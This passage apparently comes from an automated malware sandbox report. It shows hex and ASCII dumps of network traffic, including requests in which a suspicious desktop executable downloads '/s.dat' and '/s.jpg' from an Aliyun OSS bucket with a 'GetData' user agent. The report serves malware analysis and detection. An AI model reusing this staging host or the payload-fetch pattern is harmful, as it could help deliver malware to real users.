                                2025-01-07 03:15:39 UTC4096INData Raw: 77 a8 c4 d9 fd a7 56 28 73 5f 0f 7f 3b 00 66 82 36 d4 2f 7b 1c 50 0d 90 42 5e 0e b6 3d dc 83 58 6a 35 e0 f2 6f 3a a8 d5 ee 37 cd 99 ee 9c 06 8c d0 87 05 97 4d 50 36 97 03 25 ea e1 52 3c bb 3e 25 ca 4d a1 9a de 65 27 6e 38 2d 65 92 e5 96 84 ff 4a 69 e4 8b 0a 8b 94 f6 d4 7c 01 80 fb e0 03 ea 19 32 5d 29 28 3c ad 5d b5 fc 74 7f 9a bf fa 5f aa b3 08 b5 0d 57 25 c0 b8 67 cb 8c bc e8 48 4a 02 a5 57 78 65 40 ad c1 5a 91 f1 85 ed 06 07 63 d1 27 0a 48 fc b3 b0 df 6f a6 ee 6a 10 26 82 2e 2b 90 38 ca 76 a6 a6 73 fc a4 31 18 8b bd 07 98 fc 6b e9 ca cc 83 78 6a 94 92 3f 5d 02 57 0e 0c a9 36 a3 64 c6 b8 98 a5 03 28 be 9c a1 91 80 1b b7 e8 6f 73 1a dc 78 f5 54 c0 09 e3 53 1a 57 f1 88 1f f9 f7 41 dd c4 eb 74 19 ad 09 5d 4b c5 25 7f a9 10 ba 2e 1a 5c 79 23 15 00 2d cb 6f
                                Data Ascii: wV(s_;f6/{PB^=Xj5o:7MP6%R<>%Me'n8-eJi|2])(<]t_W%gHJWxe@Zc'Hoj&.+8vs1kxj?]W6d(osxTSWAt]K%.\y#-o
                                2025-01-07 03:15:40 UTC4096INData Raw: 97 9b 9d 99 9d 9b 95 97 95 8b 8d 89 8d 8b b5 b7 b5 bb bd bf 2d db b5 b7 b1 8b 8d 8f 8d 8b 95 95 95 fb 9c 9f 9d 8b 95 97 95 8b 8d 8f 9d 8b f5 f7 f5 fb fd ff fd eb f5 f7 f5 8b 8d 8f 9d 8b 95 97 95 9b 9d 9f 9d 9b 95 87 95 8b 8d 8f 12 a4 b5 e6 b5 bb bd ff 4a 92 b5 3b b5 8b 8d 8f 0d eb 95 77 94 9b 9d df 82 fb 95 0f a8 8b 8d 8f 8d 8b 75 77 75 7b 7d 7f 1d 1b 75 47 60 8b 8d 8f 8d 8b 95 97 95 9b 9d 9f 9d 9b 95 97 95 8b 8d 8f 8d 8b b5 b7 b5 bb bd bf bd bb b5 b7 b5 8b 8d 8f 93 eb 95 d7 94 9b 9d 9f 9d 9b 95 97 95 8b 8d 8f cd ae f5 7f f5 fb fd ff fd fb f5 f7 f5 8b 8d 8f 8d 8b 95 97 95 9b 9d 9f 9d 9b 95 97 95 8b 8d a1 f9 ee cd c3 b5 bb bd ef d4 ba b5 b7 a5 8b 8d 8f 8d 8b 95 97 95 9b 9d 9f 9d 9b 95 97 95 8b 8d 8f 8d 8b 75 57 75 7b 1d 51 0f 1f 14 03 14 8b 8d f9 36 8b 95
                                Data Ascii: -J;wuwu{}uG`uWu{Q6
                                2025-01-07 03:15:40 UTC4096INData Raw: 69 18 0b cc ef 77 23 0b dc 62 f5 92 bd ff f0 55 8b 71 aa 3a 3d 2b 0e e8 a2 e1 cd ea 57 ca 72 3f 3b a3 53 99 f3 19 2d 50 82 0e 0d 67 11 12 78 ff f7 c0 c2 9c d0 1f 35 b3 d6 c1 15 8b 71 1a 1f 9f 00 52 44 b6 6f bf 5c 42 7e 10 b4 79 e0 70 9b ec ea 3e 72 2b 74 62 9c c8 03 89 51 17 b4 ee 50 26 6c f4 04 88 dc ad 35 53 4d 06 b8 17 18 42 ac 5e c3 76 8a e3 0f 55 bd 10 fb 3f 3d a9 48 9d ea 3a a4 e2 a6 b4 3f 76 ce a4 1c 7c fb f9 82 7d fe 97 54 b4 b3 68 d2 ca 6b fa 63 cb 18 ff 4a 19 f9 7b ce a8 14 4b 2d e1 e4 ac ec 85 7b 1e 75 a1 29 ef 25 b4 c1 12 a6 c8 7c 21 bf 95 a2 cb d0 51 3b 62 af 3a aa cc 42 6d 00 8c 79 d0 be 06 b6 82 9f 76 84 17 1f 9e 9d b0 29 42 92 30 ee 02 cb 2e 78 cc a6 12 f0 07 e3 66 63 9f 49 05 39 61 2f 8e d5 7d 9a 70 87 1f c6 95 13 f3 f5 88 62 22 f4 1a 33
                                Data Ascii: iw#bUq:=+Wr?;S-Pgx5qRDo\B~yp>r+tbQP&l5SMB^vU?=H:?v|}ThkcJ{K-{u)%|!Q;b:Bmyv)B0.xfcI9a/}pb"3
                                2025-01-07 03:15:40 UTC4096INData Raw: 59 fc a8 65 45 fc 8d 05 fd fb b3 9f 14 a2 f6 f8 cc c4 eb 39 9d d3 a3 9f a0 42 0a 18 58 74 c7 69 1d eb 8b bf f8 0a 86 d0 b8 94 b7 61 b0 9e 73 a2 69 b3 40 d3 c4 61 59 75 53 34 0e c7 4a cf b1 8f a5 1c 40 ae d5 10 f9 b3 9d 63 52 15 9e 8b 52 f6 a8 f0 ad 49 d7 f7 72 8e 78 64 f5 39 5f 0b 52 de 78 1c 55 45 37 4b fa 52 4d 22 ef 1a 7a 2b 77 55 11 34 b8 02 76 4b bc 41 00 36 50 70 72 34 04 b2 fc fc b3 02 62 64 d3 fa df dd e5 b8 e2 bd 6c e5 a6 e2 23 8e 49 61 66 4b de 3e d6 1f 11 74 6a d1 49 c0 da 1e df 8c f9 36 8a 61 dc e3 8e c6 1a 21 61 99 12 00 4b bc 3f 2f 86 71 66 94 e7 b9 fd a5 2f a6 09 9c b6 7f c9 3c 7d 99 5e d8 fd f5 f6 1c ce 71 0e c8 38 12 5d a5 a6 a8 b9 81 05 24 3e 7f 87 5f e9 b2 ac d8 50 4b 41 40 ae 76 80 40 a4 58 df 93 6f bb a4 25 c4 dc 1b f9 98 6d 46 50 50
                                Data Ascii: YeE9BXtiasi@aYuS4J@cRRIrxd9_RxUE7KRM"z+wU4vKA6Ppr4bdl#IafK>tjI6a!aK?/qf/<}^q8]$>_PKA@v@Xo%mFPP
                                2025-01-07 03:15:40 UTC4096INData Raw: 82 6b 24 f1 76 c7 84 af a6 d8 72 87 9e 02 98 c2 20 b2 f1 7e 40 de 11 c4 b7 04 70 3b 4c f8 6d db 2d a9 ce 60 f5 10 4c 12 54 c5 c0 72 2e a1 d8 20 3a 3e 2a 25 eb 4b 0d 65 55 1a c4 48 1a 5e 6a 05 eb 8f 85 11 75 4e 9c 4d 91 ea 1e 6c 58 58 23 d5 a9 a7 43 0b 1c de b1 07 fa 5d 5e fb 87 19 ab 0f 82 15 1e ba 6f f1 63 c6 da 5d 0e ab af 31 1b bf 5a cd f6 53 1f 80 ab 2c 54 0f 0f 1b 81 1b a2 ce 13 0d 34 7e c8 33 6a cb 2c 24 f8 95 15 fe 8e 9d b5 5f fa 6f 6b 71 de 1e b5 8b 59 19 1d 09 5e ac 7c 16 63 9b d8 c8 b4 27 9d 9d bb 43 03 b0 6a a2 cc 20 6c 87 15 fd 83 53 0b 74 ba be 94 f4 dc 67 c5 f1 cb 96 3f f5 5d c0 5a b8 19 35 ae dd 45 b8 22 e8 49 6d f7 25 8d 40 da 70 d0 35 af 4d f4 b8 23 50 f0 45 df 6d c4 90 0a 98 39 7d 78 78 2e 64 92 61 cf c0 27 77 aa e9 3f f8 8d 38 ff 14 79
                                Data Ascii: k$vr ~@p;Lm-`LTr. :>*%KeUH^juNMlXX#C]^oc]1ZS,T4~3j,$_okqY^|c'Cj lStg?]Z5E"Im%@p5M#PEm9}xx.da'w?8y
                                2025-01-07 03:15:40 UTC4096INData Raw: 7d 65 0f 82 22 33 6c 58 70 0d b8 a6 df ea 7b 6d 7a 5f 99 fd 73 8d 00 c9 26 96 32 5f 9a 2d 5f 52 cd c3 af 35 d2 10 ab ac 7d 75 1f 92 32 53 12 21 c0 0e a8 ca d8 dd c7 d0 35 03 63 e9 2c 3e eb 04 88 24 5d 20 1c fa f5 63 e0 67 b3 2a db a8 82 4f 91 91 6e 78 3a 77 32 95 d2 d2 f3 31 f7 3a 09 7f 6b 09 80 20 ed f3 ca fa b6 ca 1e 07 6f f1 ea 8e 7e 4f df f1 ee 66 ca 0f a7 51 14 14 36 25 dc 96 50 91 b0 60 93 09 88 28 f5 58 20 ee bf f1 ff 75 17 d6 a0 c8 e1 27 4f 1e 06 29 03 1c 90 34 5d e2 3e e3 1d 28 c6 67 37 ac 93 2b e2 78 8e 2e d7 4d 83 2a 0a 90 3e 9f 8f 15 a3 7a 0a 90 76 d6 47 dd 4b e2 82 19 56 f6 3f ee a6 6f 8c 4a 79 5f df 1d 79 90 90 40 b3 29 a8 08 35 66 cc 97 f8 29 cb b8 4b 89 f7 f9 13 42 7a ec 0b d1 0c f7 79 ec 74 3d d3 55 25 47 d7 82 00 94 7d a5 84 da b6 7d d4
                                Data Ascii: }e"3lXp{mz_s&2_-_R5}u2S!5c,>$] cg*Onx:w21:k o~OfQ6%P`(X u'O)4]>(g7+x.M*>zvGKV?oJy_y@)5f)KBzyt=U%G}}
                                2025-01-07 03:15:40 UTC4096INData Raw: e8 d2 e7 86 d8 b8 2d 86 04 1b e1 8b 98 09 7a 3b fe 9c 4d 52 15 f8 12 ed 29 9d a8 0f 40 e6 e5 0b eb ad 15 c7 ff 17 26 89 1c e1 b5 91 c7 16 33 50 17 9c 37 41 d3 06 73 61 28 5f ab 72 93 98 00 8a 6a 27 25 8b 41 b0 e7 2a 40 2e 6b be e6 f0 18 0c d2 28 51 ab 0c 08 02 67 5f 1a 0c 87 3a cc d9 74 dd c0 fd 7b 99 48 59 37 8d c3 26 3f 4d cf ea ea 8f 47 36 91 83 9c f4 2f 52 87 f9 10 b6 44 68 27 93 d2 36 2f 5d 2c 59 59 de 90 b4 e8 85 d4 e9 71 8f 42 65 b0 d8 16 f6 ff 1e 3b 4d 23 fa 1f 9e 5f 66 d6 96 8f 3f 35 40 28 de 44 3a fe c4 20 45 37 b3 18 0e ff ad 2b a7 83 7e 88 3a 6c b9 b9 31 4d dd 30 2d 5f e5 98 94 26 e7 f1 17 4f ba 13 8e 17 f2 ca 4c 08 6f 8e 74 4a 05 8d c4 24 3d 4b fb 22 c3 67 31 f6 85 11 26 a8 6e cf 31 7a 78 b7 f3 05 66 c0 b6 4d c3 3a 0e 1c bb 55 6d 30 27 5a a7
                                Data Ascii: -z;MR)@&3P7Asa(_rj'%A*@.k(Qg_:t{HY7&?MG6/RDh'6/],YYqBe;M#_f?5@(D: E7+~:l1M0-_&OLotJ$=K"g1&n1zxfM:Um0'Z
                                2025-01-07 03:15:40 UTC4096INData Raw: ed 6d 99 07 e4 c7 b2 15 b2 42 6c 84 38 c1 7d 64 0c 9a 79 ff 71 01 27 59 e8 ac 0f 20 7d b1 81 7f 87 9c 7d 37 13 a4 d8 58 fb d7 aa 0d 1a 88 06 95 72 33 fc a9 08 eb 61 e5 1b 19 63 d2 aa 09 e2 b9 52 e1 a4 8a 08 e0 3b 67 e2 cf e9 55 97 b7 28 79 76 3f a4 7b d0 9c 14 c0 80 dc ab f5 4d 7c f8 cf 89 4a 4c ec 7a 99 13 8b 9f bf 89 fd cb 07 5c 57 9b f8 f0 51 1b 72 ea b3 52 b0 4e d4 50 16 0e f6 43 a8 45 5e f8 99 90 3e a9 4a 8f 23 54 4d 98 d2 f6 51 e0 54 ce c8 f3 3b ec 5d 4b 96 31 6f 39 fe 82 8b 66 a4 22 6a 74 1d 57 6f 34 15 b0 16 87 b1 79 02 74 8a 6e 8c ba ef c4 ed 35 cc c8 82 2e 56 35 d3 9b 89 05 6d 16 f0 98 8a 0e 66 25 2b c7 a1 c9 f5 3e b0 50 22 fe a6 40 5f f9 be 1c 04 3a 5e 6a f5 4b 68 7a cb ed b4 ba f8 98 a8 7f 86 9c b5 87 da e8 1e 72 b0 c5 a5 2a a9 48 4a cf 41 64
                                Data Ascii: mBl8}dyq'Y }}7Xr3acR;gU(yv?{M|JLz\WQrRNPCE^>J#TMQT;]K1o9f"jtWo4ytn5.V5mf%+>P"@_:^jKhzr*HJAd


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                5192.168.2.84971339.103.20.484437668C:\Users\user\Desktop\287438657364-7643738421.08.exe
                                TimestampBytes transferredDirectionData
                                2025-01-07 03:15:47 UTC111OUTGET /s.dat HTTP/1.1
                                User-Agent: GetData
                                Host: jylhok.oss-cn-beijing.aliyuncs.com
                                Cache-Control: no-cache
                                2025-01-07 03:15:48 UTC560INHTTP/1.1 200 OK
                                Server: AliyunOSS
                                Date: Tue, 07 Jan 2025 03:15:47 GMT
                                Content-Type: application/octet-stream
                                Content-Length: 28272
                                Connection: close
                                x-oss-request-id: 677C9C638797BE3039CED6CE
                                Accept-Ranges: bytes
                                ETag: "B49BF11DC361D426B398BB8C06DCFBFC"
                                Last-Modified: Tue, 07 Jan 2025 03:15:41 GMT
                                x-oss-object-type: Normal
                                x-oss-hash-crc64ecma: 2323535133252745928
                                x-oss-storage-class: Standard
                                x-oss-ec: 0048-00000113
                                Content-Disposition: attachment
                                x-oss-force-download: true
                                Content-MD5: tJvxHcNh1CazmLuMBtz7/A==
                                x-oss-server-time: 26
                                2025-01-07 03:15:48 UTC3536INData Raw: f5 e2 28 b8 bb b8 b8 b8 bc b8 b8 b8 47 47 b8 b8 00 b8 b8 b8 b8 b8 b8 b8 f8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 50 b8 b8 b8 b6 a7 02 b6 b6 02 bf 7b 5a c3 7a 37 fa 16 63 5f 36 2c 7f 2f 5d 40 48 5d 3c 30 7d 3e 5f 50 50 51 25 71 33 34 14 46 41 5a 7a 33 34 7a 3e 35 29 5a 37 35 3e 3f 11 32 32 35 11 35 35 35 35 35 35 35 f6 81 47 5c db 89 40 66 e1 b3 7a 5c db 89 40 66 e1 b3 7b 5c e4 89 40 66 e8 cb e9 5c d8 89 40 66 e8 cb ef 5c d8 89 40 66 e8 cb f9 5c df 89 40 66 e8 cb f0 5c d5 89 40 66 e8 cb ee 5c da 89 40 66 e8 cb eb 5c da 89 40 66 34 0f 05 0e 89 db 12 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 64 71 34 34 50 b2 3c 34 c2 67 ad 62 62 62 62 62 62 62 62 62 92 62 40
                                Data Ascii: (GGP{Zz7c_6,/]@H]<0}>_PPQ%q34FAZz34z>5)Z75>?2255555555G\@fz\@f{\@f\@f\@f\@f\@f\@f\@f44444444444444444444444444dq44P<4gbbbbbbbbbb@
                                2025-01-07 03:15:48 UTC4096INData Raw: 5f 05 23 23 56 27 a8 d8 33 c7 9d eb 2b a7 66 a7 83 f7 ef 2a 7e 0e 7a 6b e6 23 60 e2 be c6 b2 1d 08 46 3b 1d 1d 96 61 39 69 71 02 d2 a7 c2 59 15 5c 9c 11 31 89 34 31 31 b1 d8 bd 31 31 31 75 0a e5 79 0d b1 b4 b1 b1 31 da 49 d9 4c 5a 4c 4c 04 8f f4 4c 3f fc 4a 38 87 86 87 87 47 ac 2b 0a cc 09 ff 1e 84 0f 49 6c b1 90 b1 b1 f5 7e eb b1 7e 8d 3a f7 23 23 1a 3d 55 1c 1d d6 90 84 dc 1d fe de b7 75 bb 43 f3 36 f6 f4 bf 7b a3 b3 eb 2a e6 12 a7 6d a3 a3 e2 1b a3 a2 a3 a3 2a 6f d6 6b 25 92 60 2b 43 ca 06 43 ab 0f b6 ab ab ea 54 6d e2 63 27 ca e3 e3 e3 ab 62 a7 72 63 62 62 26 59 54 26 eb df 9b 10 58 d2 12 1e 36 5a 99 c5 bd c1 d1 5a bd f5 b1 f9 32 75 91 d0 cf d0 cc 8d 90 93 92 51 5e 5e 5e 92 92 92 92 da 19 56 da 53 82 d2 92 1b fa 82 da 53 aa c2 92 1b ea b2 d3 87 92 86
                                Data Ascii: _##V'3+f*~zk#`F;a9iqY\1411111uy1ILZLLL?J8G+Il~~:##=UuC6{*m*ok%`+CCTmc'brcbb&YT&X6ZZ2uQ^^^VSS
                                2025-01-07 03:15:48 UTC4096INData Raw: 07 0a aa de df de de 96 1b c2 b2 b2 fa 3f fe 96 b6 d3 a5 5f 1a 6c 9f 6c b7 ab 28 48 78 54 49 48 48 b7 5d e9 fe e9 e9 a1 2c ed 85 91 6e 84 1f 86 86 86 0d c2 e6 f6 86 4f 14 4e cc b7 b2 c2 9e 3c 78 18 04 bf 47 bd ca b7 3a ef b6 5e d1 5e 5e 5e 1f 65 9d 2b 21 90 29 2b 2b 2b c2 ab ab ab ab 90 53 e5 ec d1 5a 0a 3a a6 25 5e a0 d3 84 58 97 f7 cf b6 cc 34 41 24 70 0c 90 28 46 0d 0d 0d 02 98 5b 1b 5b 9e 75 c7 a5 5d 28 4d 19 65 f9 41 2f 64 64 64 6b f1 32 72 32 f5 1e b0 76 0d 0f 78 1d 49 71 d5 6d 03 02 03 03 0c 99 cf 8f cf c7 24 ff 4c b4 4f 39 67 23 5f fb 43 09 42 43 43 4c d6 80 c0 03 ca 2b db 58 23 d1 ae b8 97 f2 8a b2 ff 9a ce f6 52 ea 84 85 84 84 3c 30 3c 3c 3c 33 78 e4 7d 56 a6 09 4a 0b 61 91 3e 15 7f 15 e5 91 fa a4 ce 15 ba ef 8f a4 54 fb 93 d2 b8 48 e7 ee a6 dc
                                Data Ascii: ?_ll(HxTIHH],nON<xG:^^^^e+!)+++SZ:%^X4A$p(F[[u](MeA/dddk2r2vxIqm$LO9g#_CBCCL+X#R<0<<<3x}VJa>TH
                                2025-01-07 03:15:48 UTC4096INData Raw: 30 4a 59 ce 0f c9 ba f8 0e 39 f9 8c 87 c4 73 45 cf 41 4f 0c f3 c4 84 0d fb cc 0f 79 76 31 fa 90 92 f6 1b 94 9e dd 17 7c 7e 1a f5 7d 8b bc 79 09 04 41 8a e0 e4 6b e4 ea a3 69 02 ee 67 ef a3 65 ad 2c a4 8c 89 f9 dc c1 4a 09 88 00 e9 03 74 14 5c 97 fd 1c 54 97 18 16 5f e9 df 5e d7 5f 2b ae e7 2d 4e a9 e4 2c 69 dc db 95 57 1f dc 10 00 1f 57 e0 d6 95 91 9f dc 6a a2 e2 6b 1f ec 56 94 dc 1f ba ba ba dc dc dc dc d3 c3 58 dc dc dc dc dc ba ba ba 4c 2a 2a dc 05 84 fc 05 25 25 25 56 67 2f ec 23 6d 95 21 e6 39 33 c9 71 ba 53 9a f2 33 72 2b 7f ba eb aa f2 31 75 3b 39 7d f6 69 77 34 cb fd 7c bd fc b5 f1 34 25 41 e1 7d fe 9d 62 94 e7 6b 6b 6b 0d 0d 0d 0d 02 12 89 0d 0d 0d 0d 0d 6b 9d 45 8c 76 8c 7c 73 8c 04 c6 cb eb cb cb cb 83 4a 22 4b 4b 4b 4b 44 5c 40 4e 4b 53 0f 41
                                Data Ascii: 0JY9sEAOyv1|~}yAkige,Jt\T_^_+-N,iWWjkVXL**%%%Vg/#m!93qS3r+1u;9}iw4|4%A}bkkkkEv|sJ"KKKKD\@NKSA
                                2025-01-07 03:15:48 UTC4096INData Raw: 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 68 7b 60 ab 47 9b e3 20 f9 68 ad 35 1d 35 35 35 7d b8 79 11 31 ee 04 f4 3b 0b 0b bc 31 f0 98 9c 63 89 4e 53 ac ac 1b d8 93 d0 27 cd 15 02 32 32 7a b1 f6 02 59 c1 ce ce 92 ce 8a ce a1 ce bd ce 8a ce ab ce b8 ce a7 ce ad ce ab ce bd ce 92 ce 9a ce bc ce bb ce ab ce 9d ce a7 ce a9 ce a6 ce ba ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce
                                Data Ascii: ((((((((((((((((((((((((((((((((((((((((((((((((((((((((h{`G h5555}y1;1cNS'22zY
                                2025-01-07 03:15:48 UTC4096INData Raw: ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad fd ad ad e9 ad ad ad bd 0c b5 0c 2c ad 24 ad 9d 0c 95 0c 4c ad 44 ad fd 0c f5 0c 6c ad 64 ad dd 0c d5 0c 8c ad 84 ad 3d 0c 35 0c ac ad a4 ad 1d 0c 15 0c cc ad c4 ad 7d 0c 75 0c ec ad e4 ad 5d 0c 55 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c
                                Data Ascii: ,$LDld=5}u]U
                                2025-01-07 03:15:48 UTC4096INData Raw: 47 a9 09 fd fc 12 13 1d 3c 88 0c c6 10 da 45 42 60 a9 c1 bc 1a 11 a7 e0 2e 22 2b 0a 8c d8 4c df a8 56 70 b6 bc 66 f5 56 67 09 82 f2 d3 a3 55 15 ce e3 6f 81 d8 c2 03 30 7c 10 15 ac 5c 86 7e 88 07 1f ba 3a fb b8 4b 9a 62 ec 00 e7 8e 85 12 6b 82 15 59 35 78 08 43 90 93 b7 4d 24 38 15 5e 33 ae 0e 03 b1 b4 8a 81 33 30 10 93 30 32 31 32 32 38 53 12 7f cb 7f 7f 7f 7f 7f 58 4f 42 49 46 65 e3 2d e3 92 9f 93 93 97 92 97 a7 e8 d9 e3 d8 e1 e7 e2 b4 e5 e3 f6 e7 b0 e3 81 a3 80 91 86 83 d5 d1 dd c6 df 88 be ac b7 de d9 d0 c3 ac ad f2 d3 e3 dd d5 d0 85 d4 d7 c3 c4 91 a6 a7 ca c8 c9 c3 f2 dd f3 df d9 dc 8a db d1 c8 ce 96 ff f5 e4 f9 8a 96 9f 8d ad ce e2 ff 8f 90 8d 9e ea f7 f1 f0 c1 d9 c0 d7 d1 d4 82 d3 d0 c0 f3 9e f7 fd ec f1 82 9e 97 85 a5 c6 ea e1 84 c1 b7 84 f6 ed e2
                                Data Ascii: G<EB`."+LVpfVgUo0|\~:KbkY5xCM$8^330021228SXOBIFe-
                                2025-01-07 03:15:48 UTC160INData Raw: bc 56 8d a1 48 a7 d8 db 20 3c c6 64 eb a7 f5 dc 87 01 85 4d b3 73 df 7e 2f 72 c3 fe 90 7f 53 03 95 c3 69 b4 78 70 7f 47 cd 54 d7 16 ca e8 7a 26 d7 20 64 6e df e5 43 1a 7a 90 7c ad 5f 36 aa 81 b5 fe 6e b2 cd cf ba 1d 41 b4 54 53 e9 3f 79 f1 5e 23 29 65 39 09 a1 03 8d 0a fe 23 25 a7 5c cd 0e 5d 86 0a 45 0c 38 50 e4 30 db dd d2 af bb de fa 16 60 6f 98 ea 3b 50 91 e8 7f a4 41 45 cc 50 fe 5e b5 e2 5c 31 55 2a 67 69 1d 23 55 9c 19 fe aa 01 a8 35 68 df e2 53 d9 70 80 53 a6 ac 26 d6
                                Data Ascii: VH <dMs~/rSixpGTz& dnCz|_6nATS?y^#)e9#%\]E8P0`o;PAEP^\1U*gi#U5hSpS&


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                6192.168.2.84971439.103.20.484437668C:\Users\user\Desktop\287438657364-7643738421.08.exe
                                TimestampBytes transferredDirectionData
                                2025-01-07 03:15:49 UTC111OUTGET /s.jpg HTTP/1.1
                                User-Agent: GetData
                                Host: jylhok.oss-cn-beijing.aliyuncs.com
                                Cache-Control: no-cache
                                2025-01-07 03:15:49 UTC544INHTTP/1.1 200 OK
                                Server: AliyunOSS
                                Date: Tue, 07 Jan 2025 03:15:49 GMT
                                Content-Type: image/jpeg
                                Content-Length: 8299
                                Connection: close
                                x-oss-request-id: 677C9C65B2582235363FD723
                                Accept-Ranges: bytes
                                ETag: "9BDB6A4AF681470B85A3D46AF5A4F2A7"
                                Last-Modified: Mon, 06 Jan 2025 08:35:20 GMT
                                x-oss-object-type: Normal
                                x-oss-hash-crc64ecma: 692387538176721524
                                x-oss-storage-class: Standard
                                x-oss-ec: 0048-00000104
                                Content-Disposition: attachment
                                x-oss-force-download: true
                                Content-MD5: m9tqSvaBRwuFo9Rq9aTypw==
                                x-oss-server-time: 11
                                2025-01-07 03:15:49 UTC3552INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 90 00 90 00 00 ff e1 00 5a 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 05 03 01 00 05 00 00 00 01 00 00 00 4a 03 03 00 01 00 00 00 01 00 00 00 00 51 10 00 01 00 00 00 01 01 00 00 00 51 11 00 04 00 00 00 01 00 00 16 25 51 12 00 04 00 00 00 01 00 00 16 25 00 00 00 00 00 01 86 a0 00 00 b1 8f ff db 00 43 00 02 01 01 02 01 01 02 02 02 02 02 02 02 02 03 05 03 03 03 03 03 06 04 04 03 05 07 06 07 07 07 06 07 07 08 09 0b 09 08 08 0a 08 07 07 0a 0d 0a 0a 0b 0c 0c 0c 0c 07 09 0e 0f 0d 0c 0e 0b 0c 0c 0c ff db 00 43 01 02 02 02 03 03 03 06 03 03 06 0c 08 07 08 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c ff c0 00 11 08
                                Data Ascii: JFIFZExifMM*JQQ%Q%CC
                                2025-01-07 03:15:49 UTC4096INData Raw: 06 6a 97 a0 76 9f 8a 4c ce c2 04 d4 99 b6 a3 2e 14 ad df 13 51 65 93 89 43 91 9f a1 22 66 8b 67 93 6a a2 a8 41 af 7a 2c ae 4c aa 83 63 3f 31 b1 0c 38 b2 5a bc ee 9f ac 38 b8 3b d8 89 02 c6 e4 8d 4f 83 68 c8 cb e9 cd 46 82 eb f8 de 65 da d0 b3 5f 34 d9 d6 6d db 55 d9 bc fb a3 e2 61 23 e6 e4 e3 87 ec ad ee cf c4 48 ef c7 73 cd d6 f3 c4 81 f4 1c 39 58 f8 db f6 39 e6 54 8a 0c ef 0e 3c c4 02 47 ce 01 4a eb 07 3d 8b cf 64 01 b1 11 50 1f 56 fc 58 fd 52 90 48 39 56 7e 31 61 02 cb 69 da d9 d8 cc 26 ee 13 ab 4c 25 c9 2d d0 31 03 dc f8 c8 d7 3b 32 53 27 d0 3e e3 d2 43 01 15 0b c5 c7 aa 26 cf 01 8d 0f 68 05 6c 61 40 dc 57 84 5a 54 79 13 7c 39 5f 3b 5d be 3a 5e 38 29 ef 27 40 e5 0e 2f e3 91 59 ab d5 8c 1a 9b 83 db 73 71 24 d7 68 16 7f 18 08 bb 51 3d 32 5b d8 c4 b1 43
                                Data Ascii: jvL.QeC"fgjAz,Lc?18Z8;OhFe_4mUa#Hs9X9T<GJ=dPVXRH9V~1ai&L%-1;2S'>C&hla@WZTy|9_;]:^8)'@/Ysq$hQ=2[C
                                2025-01-07 03:15:49 UTC651INData Raw: d6 f2 f5 18 89 8e 8a db 3d b5 89 92 61 93 d9 95 d6 f9 fa e8 f6 8e e8 f9 2d 9f 8a 17 a0 e4 d1 c1 a0 b7 a6 2d 71 ae f8 c9 d9 ef da b0 c5 da fa da d3 d9 f2 c0 b8 ea 98 18 bd f0 db b2 82 ae c3 ad a0 a8 b3 8b a8 a6 a7 8d 1d d0 9d 80 92 80 87 97 c7 d6 97 a8 da 92 be bd ad bf db e0 e5 e2 8f 56 e5 a7 8b 84 86 89 eb ec 39 ec a8 95 85 a2 81 d4 9a 95 92 8b 8a ab fa fc fd fe b4 45 53 4c 46 48 36 34 f8 7b 0a 05 0b 03 0d 01 0f 1f 11 1d 13 1b 15 19 17 e7 16 1a 14 1c 12 1e 10 20 2e 22 2c 24 2a 26 28 28 d6 25 2b 23 2d 21 2f 3f 31 3d 33 3b 35 39 37 37 39 3a 3b 3c f6 8f 1f 40 51 42 43 63 45 76 3f 0a e1 4a 4b 7c 4d 3e 1b 54 09 32 53 6c 7f 97 57 40 d9 5a 77 8c 5d 42 42 71 c9 62 63 ec 65 4a 47 68 75 52 6b 60 38 6f e3 30 71 6e 2b 70 63 16 77 76 2e 4a 69 7c 7d ee 7e 96 81 8c 84
                                Data Ascii: =a--qV9ESLFH64{ .",$*&((%+#-!/?1=3;59779:;<@QBCcEv?JK|M>T2SlW@Zw]BBqbceJGhuRk`8o0qn+pcwv.Ji|}~


                                Statistics

                                CPU Usage

                                Click to jump to process

                                Memory Usage

                                Click to jump to process

                                High Level Behavior Distribution

                                Click to dive into process behavior distribution

                                Behavior

                                Click to jump to process

                                System Behavior

                                General

                                Target ID:0
                                Start time:22:14:07
                                Start date:06/01/2025
